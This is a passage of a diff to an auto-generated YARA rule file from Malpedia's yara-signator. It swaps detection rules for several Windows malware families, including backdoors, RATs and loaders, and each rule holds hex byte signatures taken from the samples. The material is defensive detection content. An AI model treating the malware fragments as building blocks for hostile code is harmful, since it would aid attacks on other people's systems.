+		logic_hash = "fbea70ebd33891fb1f580e85b1d2c0146d8b7b0ac901561f3697caf4edb74461"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113573,32 +113494,32 @@ rule MALPEDIA_Win_Ranbyus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 83c40c 33c0 eb03 83c8ff 5f }
-		$sequence_1 = { 59 85ff 743e 56 6a01 }
-		$sequence_2 = { 83661800 33c0 5e c3 56 }
-		$sequence_3 = { 89460c 8b06 59 894604 }
-		$sequence_4 = { 55 8d6c2490 81ec28010000 56 }
-		$sequence_5 = { 3b4c2404 7504 83601800 33c0 40 eb11 50 }
-		$sequence_6 = { 6801200000 e8???????? 8bf0 59 }
-		$sequence_7 = { 83c605 e9???????? 47 e9???????? 0fb64e01 }
-		$sequence_8 = { e8???????? 85c0 7504 83c8ff c3 c7402401000000 33c0 }
-		$sequence_9 = { c706???????? eb07 8bce e8???????? 837e0400 75f3 }
+		$sequence_0 = { f048ff08 7510 488b4df0 4881c120020000 e8???????? 90 4883c420 }
+		$sequence_1 = { f048ff08 0f855dfeffff 4883c178 e8???????? e9???????? 488b8558010000 48894530 }
+		$sequence_2 = { 741b 4c39c0 0f847c000000 420fb61c02 80c3d0 49ffc0 80fb0a }
+		$sequence_3 = { e9???????? 4c8d0547ba2d00 4889c2 e8???????? 4c8d0538ba2d00 4889c1 e8???????? }
+		$sequence_4 = { e9???????? 8b05???????? 65488b0c2558000000 488b34c1 488d8e38020000 488d15c6f10000 e8???????? }
+		$sequence_5 = { f30f7f06 488b9de0030000 4885db 0f8411010000 488db550010000 488d95b0000000 41b898000000 }
+		$sequence_6 = { e8???????? 84c0 488bbd08040000 743b 8b05???????? 65488b0c2558000000 488b04c1 }
+		$sequence_7 = { e8???????? eb17 4c8955e8 4c894df0 4c8d05cc034500 4889c1 e8???????? }
+		$sequence_8 = { f30f7f8910020000 488b4c2448 4c89ea e8???????? 4889f1 4821c1 f30f6f040f }
+		$sequence_9 = { e8???????? eb2e c685c700000001 4c8d050b894c00 4c89f9 e8???????? eb16 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 20177920
 }
-rule MALPEDIA_Win_Logpos_Auto : FILE
+rule MALPEDIA_Win_Netspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "738ffd15-c890-5ce3-8158-aad7627bd488"
+		id = "57c767b8-cd93-5302-911f-6988f847c306"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.logpos_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netspy_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "b0bb7c96824becdbd2b84481288798e82499176f0ad872177caf0cac7c2bcced"
+		logic_hash = "ecbb26e5fda724e71586bc695509ce41d8249123e16dac20dd9df75d451bc239"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113612,32 +113533,30 @@ rule MALPEDIA_Win_Logpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 89e5 60 31c0 31c9 fc 8b7508 }
-		$sequence_1 = { e8???????? 894328 681c429282 ff33 ff736c }
-		$sequence_2 = { 83fa00 0f852c000000 8d4001 8945f8 8a00 }
-		$sequence_3 = { 48 83ec38 53 56 57 41 52 }
-		$sequence_4 = { 8b90d8000000 48 85d2 7410 48 394a08 7505 }
-		$sequence_5 = { c744241001000000 c744240c00000000 8b442450 89442414 }
-		$sequence_6 = { 8344242401 48 8344243001 837c243800 7406 48 }
-		$sequence_7 = { 4c 8d0570040000 49 8b88d8000000 48 }
-		$sequence_8 = { 83f82f 0f8549000000 8b45fc c680a360400000 8b45fc }
-		$sequence_9 = { 68ba917bf6 ff33 ff7370 53 e8???????? 89433c }
+		$sequence_0 = { 4829c4 488b8538340000 4889e1 48898d704d0000 e8???????? }
+		$sequence_1 = { e9???????? 8b858c170000 3da1b579e1 0f84d92c0000 e9???????? 8b858c170000 3da646bcce }
+		$sequence_2 = { 48898510130000 8b15???????? 833d????????0a 0f9cc1 }
+		$sequence_3 = { a801 0f8505000000 e9???????? 488b8da0380000 448b859c380000 }
+		$sequence_4 = { b8a51c0a0c f6c201 0f45c8 488b85c84a0000 8908 8b15???????? }
+		$sequence_5 = { 4889e1 48898d90560000 e8???????? 4829c4 }
+		$sequence_6 = { e9???????? 488b85384d0000 8b00 8985544d0000 e9???????? 488b85404d0000 8a00 }
+		$sequence_7 = { 448b855c570000 4889c4 b9bc3715ff b88819ea06 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 12033024
 }
-rule MALPEDIA_Win_Blackcoffee_Auto : FILE
+rule MALPEDIA_Win_Warezov_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c2ef4943-3003-5a8e-b84c-2fdafd870b99"
+		id = "0ec3e9cd-ecfd-5888-8e71-8272853df26c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackcoffee_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warezov"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warezov_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "b695e8fbe67a22ec1c98f5f738aa4dd5737b4b8062371c0306d53cad47c03140"
+		logic_hash = "8a169bcf46fd926fd65360d9ee1ccb1e67a44520c106569cb5acbfc473bbceb3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113651,32 +113570,32 @@ rule MALPEDIA_Win_Blackcoffee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75fc 57 6a01 ff15???????? 8bd8 3bdf }
-		$sequence_1 = { 53 e8???????? 83c40c ffd3 3bc7 7460 8b5610 }
-		$sequence_2 = { 897dfc 8945f4 50 8d4610 }
-		$sequence_3 = { 50 c70614000000 ff15???????? 8d85dcfeffff 83c40c 8945e8 8d45e0 }
-		$sequence_4 = { c68501f0ffff36 c68502f0ffff34 c68503f0ffff50 c68504f0ffff72 }
-		$sequence_5 = { 8b45fc 89460c c70614000000 e9???????? 83660c00 8d85b4feffff 50 }
-		$sequence_6 = { 6800800000 57 53 ff15???????? 8b4610 }
-		$sequence_7 = { e8???????? 8806 8d45b0 50 }
-		$sequence_8 = { 897dfc 57 ff15???????? 8bd8 3bdf 747a 8b460c }
-		$sequence_9 = { 895efc ff75f8 56 e8???????? 83c40c 56 }
+		$sequence_0 = { 8a8c04cc000000 8a9404fc000000 02d1 8a8c04fd000000 889404fc000000 8a9404cd000000 02ca }
+		$sequence_1 = { c68424a300000065 c68424a400000062 c68424a500000075 c68424a600000070 c68424a700000077 889c24a8000000 c68424ad00000070 }
+		$sequence_2 = { ffd3 50 ff15???????? 85c0 8b942430010000 8902 7531 }
+		$sequence_3 = { 8d8c24a8000000 51 6a00 68???????? 8d9424b8010000 52 }
+		$sequence_4 = { c684243801000039 c6842439010000ac c684243a0100000f c684243b010000fe c684243c01000046 c684243d0100006a c684243e01000038 }
+		$sequence_5 = { 885e14 8b5008 56 8bcd 885a14 e8???????? eb78 }
+		$sequence_6 = { 0473 b142 f6e9 8ad8 8b06 80eb12 80cbcd }
+		$sequence_7 = { 33f6 4d 85ed ba77000000 7e50 8b74240c 53 }
+		$sequence_8 = { 32ca 888c049c020000 40 83f809 7ce3 8d8424a8020000 50 }
+		$sequence_9 = { c68424aa000000d3 c68424ab000000b8 c68424ac000000a9 c68424ad0000002e c68424ae00000049 c68424af00000041 }
 
 	condition:
-		7 of them and filesize < 118784
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Byeby_Auto : FILE
+rule MALPEDIA_Win_Albaniiutas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ebfb487-5cbf-53be-adad-b7561bd94d85"
+		id = "6944bcab-7fa1-5041-889b-6d1c7305340e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.byeby_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.albaniiutas_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "14e04fc099db6b56de85356d95024648b8f691b46ad7013820136f566a988b61"
+		logic_hash = "ae4d05366f3510708fa40872966a48e3078a4c97e3d0950cdaf94819ee9ab7c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113690,32 +113609,32 @@ rule MALPEDIA_Win_Byeby_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c78424a002000059335630 c68424a402000000 50 8d8424380a0000 50 ff15???????? }
-		$sequence_1 = { c68424d402000000 c784242c0300005130394e c78424300300005455464f c684243403000000 c78424e402000056464a42 c78424e8020000546c4e47 c68424ec02000000 }
-		$sequence_2 = { 8d85c0f9ffff 66c745e80d0a 6804050000 50 f30f7f45d4 c645ea00 }
-		$sequence_3 = { 50 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b048518ab0110 ff3401 }
-		$sequence_4 = { 85c0 7411 ff35???????? 8bc8 }
-		$sequence_5 = { 8bf0 83feff 0f8489000000 6a00 56 ff15???????? 3d00900100 }
-		$sequence_6 = { 894c2428 ff15???????? 85c0 7430 8b7c2414 8d4900 83f8ff }
-		$sequence_7 = { 64890d00000000 59 5f 5e 8b8c243c100000 33cc }
-		$sequence_8 = { 0fbec2 0fb680d0450110 83e00f eb02 33c0 8bbdc8fdffff 6bc009 }
-		$sequence_9 = { 740b 8d44246c 50 ff15???????? 8b442430 85c0 7409 }
+		$sequence_0 = { c745e410000000 c705????????02000000 c745e802000000 c745ec07000000 c745f000000000 }
+		$sequence_1 = { 03048d90df0210 50 ff15???????? 5d }
+		$sequence_2 = { 83c40c 5d c20c00 e9???????? 55 8bec ff7508 }
+		$sequence_3 = { 56 8b048d90df0210 57 8b7d10 }
+		$sequence_4 = { 8b049590df0210 f644082801 7421 57 e8???????? 59 50 }
+		$sequence_5 = { 8975ec 0fb70445b01a0110 66894c4774 8bcf }
+		$sequence_6 = { 0f8e6fffffff 83c8ff eb07 8b04cd4c6b0110 }
+		$sequence_7 = { 8b4508 c740183c1b0110 c74104513f0000 e9???????? }
+		$sequence_8 = { 8b4508 c74018241c0110 e9???????? 8b550c c74104473f0000 83fa06 0f8430070000 }
+		$sequence_9 = { c74048c0a40110 8b4508 6689486c 8b4508 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 566272
 }
-rule MALPEDIA_Win_Nimplant_Auto : FILE
+rule MALPEDIA_Win_Terminator_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a344304a-2438-58e4-b960-8890c3f03181"
+		id = "a907b97c-e30c-569d-92f6-e3c29e0c0bce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimplant_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.terminator_rat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3bcc7f38e2b9ac77c0e1b998e8b9b2d2ae5abbf7ef3c4a3072bece45de56739e"
+		logic_hash = "65d625611fed0b10063c05f198c3f84077666921d947cf7651a55c8e71d92a0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113729,32 +113648,32 @@ rule MALPEDIA_Win_Nimplant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d05a49c0400 e8???????? 4885db 740f 48b80000000000000040 488503 }
-		$sequence_1 = { 4d85e4 0f8886000000 410fb6443c08 89c2 83e2fd 80fa3c 7404 }
-		$sequence_2 = { 4d29dd 4801fe 488d4802 4839d1 7c16 4801d2 4883c003 }
-		$sequence_3 = { 744a 488d4c2430 4c89ea e8???????? 488b7c2430 0fb62b 4c89e9 }
-		$sequence_4 = { 4c8b11 4c8b5908 488b02 4c89c3 4c8b4208 4c8d6c2430 4989d4 }
-		$sequence_5 = { 498b4708 420fb6440807 3c5c 744d 3c2f 7449 ba01000000 }
-		$sequence_6 = { 4c89fa 4c89c9 4c894c2438 e8???????? 0fb63b 4c8b7c2458 4c8b4c2438 }
-		$sequence_7 = { 48897c2438 0f8093030000 4885c0 0f88c2050000 488d7c2470 4889c2 488dac2480000000 }
-		$sequence_8 = { 4c894c2448 4c895c2440 e8???????? 4c8b5c2440 4c8b4c2448 4d01d9 0f8050020000 }
-		$sequence_9 = { e8???????? 0fb62b 4084ed 0f85d6fdffff 89f0 488d9424f0000000 c744242001000000 }
+		$sequence_0 = { ffb7e8feffff 8d854d010000 8987e8feffff 8b8541010000 c1e006 }
+		$sequence_1 = { c0c003 3441 c0c003 3452 c0c003 3443 }
+		$sequence_2 = { 6a04 bb00040000 57 53 6a00 }
+		$sequence_3 = { 53 56 8b7708 ff77fc ffb51d010000 8f47f4 }
+		$sequence_4 = { 8d4618 50 8b8539010000 03c1 50 e8???????? 8b4610 }
+		$sequence_5 = { 50 e8???????? 83f8ff 7408 81c400040000 }
+		$sequence_6 = { 8b4b0c ac 3459 c0c803 3448 c0c803 }
+		$sequence_7 = { 8f87f0fbffff 5e 5b 81c410040000 }
+		$sequence_8 = { e9???????? ff7610 8b8d35010000 8d4618 50 8b8539010000 03c1 }
+		$sequence_9 = { ff5541 50 ff5569 8bf0 }
 
 	condition:
-		7 of them and filesize < 1811456
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Privateloader_Auto : FILE
+rule MALPEDIA_Win_Poison_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f74899e2-5f0f-5412-9628-abf5d89b0b25"
+		id = "7c6f2ea3-14d0-5bd3-b5de-002b01a6e4ac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.privateloader_auto.yar#L1-L180"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poison_rat_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "6d2070cfc4fc90b89a113279c1da7a1229970780c46dc9914cb804e46d0ce9c2"
+		logic_hash = "3e3b3a6380a6de226db390b398cafc3338e9d953c2f6c73b523494bf22932b99"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113768,43 +113687,34 @@ rule MALPEDIA_Win_Privateloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 83ec1c 894df8 8b45f8 8b4810 894df4 }
-		$sequence_1 = { 8945f4 8b4dfc 83791408 7209 }
-		$sequence_2 = { 8b55e4 8a45ff 88040a 8b45f8 }
-		$sequence_3 = { 8b4d08 3b4814 776d 8b55f8 8955f4 8b45f4 8945ec }
-		$sequence_4 = { 8b45d8 8b4ddc 8b55d0 8b75d4 }
-		$sequence_5 = { 8b4508 8945e4 8b4de8 034de4 8a55ff }
-		$sequence_6 = { 8945c8 8955cc 8b45c8 8b55cc 5e }
-		$sequence_7 = { 8b55f8 8b45f4 3b4214 736c }
-		$sequence_8 = { e8???????? 33d2 b93f000000 f7f1 }
-		$sequence_9 = { 8b4590 8b4d94 8b5588 8b758c }
-		$sequence_10 = { a3???????? 33c0 5e c3 3b0d???????? }
-		$sequence_11 = { e8???????? 83c610 83c002 83ef08 }
-		$sequence_12 = { 81ec68010000 a1???????? 33c5 8945fc 56 57 }
-		$sequence_13 = { 83c201 8955e0 83d600 8975e4 }
-		$sequence_14 = { 8b4de0 8b45e4 50 51 52 56 e8???????? }
-		$sequence_15 = { 6a04 8d4310 50 6a06 }
-		$sequence_16 = { 0bc8 56 57 7529 }
-		$sequence_17 = { 8b8578ffffff 8b8d7cffffff 8b9570ffffff 8bb574ffffff }
-		$sequence_18 = { 03d0 8b4d9c 13f1 83c201 }
+		$sequence_0 = { f3ab 6810270000 8d8dc4d5ffff 6a01 }
+		$sequence_1 = { 83e61f 8b048580c54000 8b04f0 83f8ff }
+		$sequence_2 = { 33f3 8bf9 8930 8bf1 c1ef10 c1e908 }
+		$sequence_3 = { 33d7 8b7c2414 c1ef18 8b3cbd30984000 }
+		$sequence_4 = { 8ac8 80c120 888840b34000 eb1f 83f861 }
+		$sequence_5 = { 8bd3 c1ea18 c1ed10 8b149530984000 }
+		$sequence_6 = { 331c9530984000 8bd7 81e2ff000000 331c9530a44000 8b10 }
+		$sequence_7 = { 8bd9 c1eb18 895c2420 8bdf 8b7c2420 c1eb10 }
+		$sequence_8 = { 8a6e08 8a4e09 c1e108 0bca 33d2 8a560b }
+		$sequence_9 = { 330c9530a04000 8bd5 81e2ff000000 81e3ff000000 c1ed18 }
 
 	condition:
-		7 of them and filesize < 3670016
+		7 of them and filesize < 101688
 }
-rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE
+rule MALPEDIA_Win_Calmthorn_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2eb10499-a33e-504f-b2b6-402a6cc658a9"
+		id = "cf990769-6e13-5a67-bc05-b21c727d36bf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bazarbackdoor_auto.yar#L1-L624"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.calmthorn_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "bd8ba9a21bc32243d9a5d52be7c33e7ba5fb181916b5174a91f30401b1052790"
+		logic_hash = "a1bc3f3172ae049034dbbb2cc969035914c9181e535af50f1d71d6e16050356b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113816,98 +113726,34 @@ rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bce 4889442420 ff15???????? 85c0 780a 4898 }
-		$sequence_1 = { 41b8e6b5a12c 448d4a7d e8???????? 4885c0 740c }
-		$sequence_2 = { 4533c0 ffd0 eb03 488bc7 83f8ff }
-		$sequence_3 = { 48635004 85d2 7415 48035138 488b4928 }
-		$sequence_4 = { 0fb70f ff15???????? 0fb74f02 0fb7d8 ff15???????? 0fb74f08 }
-		$sequence_5 = { 488d4d80 e8???????? 498bd6 488d4d80 }
-		$sequence_6 = { ff15???????? 0fb74f08 440fb7e8 ff15???????? }
-		$sequence_7 = { 7507 33c0 e9???????? b8ff000000 }
-		$sequence_8 = { c3 0fb74c0818 b80b010000 663bc8 }
-		$sequence_9 = { cc 4053 4883ec20 b902000000 }
-		$sequence_10 = { 4533c9 4889442428 488d95a0070000 488d442470 41b80f100000 488bce 4889442420 }
-		$sequence_11 = { 418d5508 488bc8 ff15???????? 488bd8 4885c0 }
-		$sequence_12 = { 48c1e108 4803c8 8bc1 488d94059f070000 }
-		$sequence_13 = { 31ff 4889c1 31d2 4989f0 }
-		$sequence_14 = { 488d9590050000 488bce ff15???????? 85c0 }
-		$sequence_15 = { e8???????? 4889c7 8b05???????? 8b0d???????? }
-		$sequence_16 = { e8???????? 4c89e1 e8???????? 8b05???????? }
-		$sequence_17 = { 08ca 80f201 7502 ebfe }
-		$sequence_18 = { 488bd3 e8???????? ff15???????? 4c8bc3 33d2 }
-		$sequence_19 = { 0f94c3 83fa09 0f9fc1 83fa0a 0f9cc2 30da 7519 }
-		$sequence_20 = { 83ff0a 0f9cc3 83ff09 0f9fc0 38d3 }
-		$sequence_21 = { 0fb6d1 80f973 7504 0fb65305 33c0 }
-		$sequence_22 = { 4889442428 488d95b0030000 488d4580 41b80f100000 }
-		$sequence_23 = { 0f9cc3 84d3 7504 30d3 }
-		$sequence_24 = { c744242800000001 4533c9 4533c0 c744242002000000 ba1f000f00 }
-		$sequence_25 = { e8???????? 8bd8 ff15???????? 4d8bc7 }
-		$sequence_26 = { ff15???????? 31db 4889c1 31d2 }
-		$sequence_27 = { e8???????? 4889f1 e8???????? 8b05???????? 8b0d???????? }
-		$sequence_28 = { 89d0 83f0fe 85d0 0f94c2 0f95c0 83f90a 0f9cc3 }
-		$sequence_29 = { 0fb65305 33c0 80f973 0f94c0 }
-		$sequence_30 = { 0fafd0 89d1 83f1fe 21d1 }
-		$sequence_31 = { c744242880000000 c744242003000000 4889f9 ba00000080 41b801000000 }
-		$sequence_32 = { 31ed 4889c1 31d2 4989d8 }
-		$sequence_33 = { 0f9cc3 83f909 0f9fc1 38d3 7507 08c1 }
-		$sequence_34 = { 7528 0fb64b04 0fb6d1 80f973 }
-		$sequence_35 = { 08c1 80f101 7502 ebfe }
-		$sequence_36 = { e8???????? 4c897c2420 4889d9 89fa }
-		$sequence_37 = { 84d2 7405 80fa2e 750f 0fb6c1 }
-		$sequence_38 = { 4889c1 31d2 4d89f8 ffd3 }
-		$sequence_39 = { 31d2 4989d8 ff15???????? 488906 }
-		$sequence_40 = { 4c8bf0 4889442458 488d4801 e8???????? }
-		$sequence_41 = { 4889fa 4189f0 4d89f1 ffd0 }
-		$sequence_42 = { 8d4833 ff15???????? c744242810000000 4533c9 }
-		$sequence_43 = { 4889f1 ba00000080 41b801000000 4531c9 }
-		$sequence_44 = { 48c744243000000000 c744242880000000 c744242003000000 4889f1 ba00000080 }
-		$sequence_45 = { e8???????? 8bc8 e8???????? 8bf8 85ff 7507 6a05 }
-		$sequence_46 = { 3c0a 7223 89d0 24df 04bf 3c1a }
-		$sequence_47 = { 84db 7402 ff06 8d4c2410 e8???????? 33d2 85c0 }
-		$sequence_48 = { 66890d???????? 0fb7ca ff15???????? b901000000 66c746020100 668906 }
-		$sequence_49 = { 7506 8b0e 894c2460 0fb7c0 }
-		$sequence_50 = { 686af17afc 6a04 5a e8???????? 59 }
-		$sequence_51 = { 6685ff 0f849c000000 837c2460ff 0f858c000000 }
-		$sequence_52 = { 33d2 8d8d00ffffff e8???????? eb18 51 8d4e01 e8???????? }
-		$sequence_53 = { 59 59 85c0 740b 8bc8 c60100 41 }
-		$sequence_54 = { 50 0fb745e8 50 68???????? e8???????? }
-		$sequence_55 = { 51 8b4d00 03cf e8???????? 59 3b442414 }
-		$sequence_56 = { 0fb7d8 0fb74708 50 ff15???????? 0fb7c8 }
-		$sequence_57 = { 6a00 ffd3 50 ffd6 33c0 5f 5e }
-		$sequence_58 = { 83f902 0f95c2 83c224 eb05 ba29000000 }
-		$sequence_59 = { 8be5 5d c3 6a40 6800300000 ff7750 }
-		$sequence_60 = { 8d450c 50 ff7508 56 ff15???????? 6a00 }
-		$sequence_61 = { 660f73d801 660febd0 660f7ed0 84c0 }
-		$sequence_62 = { 83c40c 8d4101 51 66a3???????? ff15???????? }
-		$sequence_63 = { 8d7001 81fe80000000 760c 80e1f2 80c902 }
-		$sequence_64 = { 68???????? e8???????? 83c410 b800308804 6a00 }
-		$sequence_65 = { 85d2 740d 33d2 83f902 0f95c2 }
-		$sequence_66 = { 0f848c000000 488b442430 83782000 7460 488b442430 }
-		$sequence_67 = { 7460 488b442430 488b00 8b4028 488b4c2440 4803c8 488bc1 }
-		$sequence_68 = { 89442424 48c744242800000000 41b800100200 488d15d02f0000 488d4c2420 }
-		$sequence_69 = { 4863442430 486bc010 488d0de3380200 4803c8 }
-		$sequence_70 = { 488d0de3380200 4803c8 488bc1 48634c2434 488d04c8 48634c2438 8b0488 }
-		$sequence_71 = { 4533c0 ba01000000 488b4c2440 ff9424a0000000 89842480000000 83bc248000000000 }
-		$sequence_72 = { 488d4c2420 e8???????? 4889442428 4c8d052a200000 }
-		$sequence_73 = { 4c8d052a200000 488b542428 488d4c2420 e8???????? 4889442430 ff542430 }
+		$sequence_0 = { eb1e 8b95e42fffff 83c201 8b85e82fffff 83d000 8995e42fffff 8985e82fffff }
+		$sequence_1 = { ebba 0fb68d2cfdffff 83f901 7552 c785a0c2ffff00000000 eb0f 8b95a0c2ffff }
+		$sequence_2 = { ebba 0fb695a6fdffff 83fa01 7553 0f57c0 660f13858498ffff eb1e }
+		$sequence_3 = { e8???????? 83c404 398524ecffff 7d20 8b85e4eeffff 83c001 8985e4eeffff }
+		$sequence_4 = { ebba 0fb69568fdffff 83fa01 7552 c785e4e2ffff00000000 eb0f 8b85e4e2ffff }
+		$sequence_5 = { ebba 0fb68d3ffdffff 83f901 7553 0f57c0 660f1385bc4dffff eb1e }
+		$sequence_6 = { e8???????? 83c404 39855cdeffff 7d20 8b8df4f7ffff 83c101 898df4f7ffff }
+		$sequence_7 = { eb02 ebba 0fb68d16fdffff 83f901 7556 0f57c0 660f13859423ffff }
+		$sequence_8 = { ebbb 0fb68d33fdffff 83f901 7552 c785fcc4ffff00000000 eb0f 8b95fcc4ffff }
+		$sequence_9 = { 8b8d5c1bffff 83c101 8b95601bffff 83d200 898d5c1bffff 8995601bffff 83bd601bffffff }
 
 	condition:
-		7 of them and filesize < 2088960
+		7 of them and filesize < 2322432
 }
-rule MALPEDIA_Win_Ground_Peony_Auto : FILE
+rule MALPEDIA_Win_Redleaves_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "801058db-7b66-5372-8745-75ac698daed8"
+		id = "b12b9704-a80b-52f8-bcf2-a2bc41cbf847"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ground_peony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ground_peony_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redleaves_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "e6e32f0220bb10dd7446439a2221f39d91c5ad68ccd69dfaaf804fe3b4efdc99"
+		logic_hash = "462d228f5e12ac81384499c032e83f48dca27fd714ed17b6018f4ee42f07e472"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113919,32 +113765,39 @@ rule MALPEDIA_Win_Ground_Peony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d15c28a0000 488d0db38a0000 e8???????? 488b4308 833800 }
-		$sequence_1 = { 4833c4 4889842460050000 488bd1 4d8d4310 498d8bd8fbffff ff15???????? }
-		$sequence_2 = { eb10 488bc8 ff15???????? 488d0d251e0100 }
-		$sequence_3 = { e8???????? 48b8d2bc1a37d2bc1a37 41b802000000 4889842420080000 8bd5 4889842428080000 }
-		$sequence_4 = { ff15???????? 33d2 488d4c2450 41b804010000 e8???????? 41b804010000 }
-		$sequence_5 = { f20f102d???????? f20f590d???????? f20f59ee f20f5ce9 f2410f1004c1 488d1536830000 }
-		$sequence_6 = { 4883c428 c3 488d15878e0000 488d0d808d0000 }
-		$sequence_7 = { 8b0a e8???????? 90 488d1d9e2f0100 }
-		$sequence_8 = { e8???????? eb22 488d0da51a0100 e8???????? }
-		$sequence_9 = { 4883ec20 488bda 4c8d0def960000 8bf9 }
+		$sequence_0 = { 57 54 53 51 7565 7279 55 }
+		$sequence_1 = { 59 89f9 8d64241c d2c0 }
+		$sequence_2 = { 8d64241c d2c0 8a01 9c }
+		$sequence_3 = { 89d0 29f8 5f 5b }
+		$sequence_4 = { 9c 894504 9c 9c }
+		$sequence_5 = { 7279 55 7365 7254 }
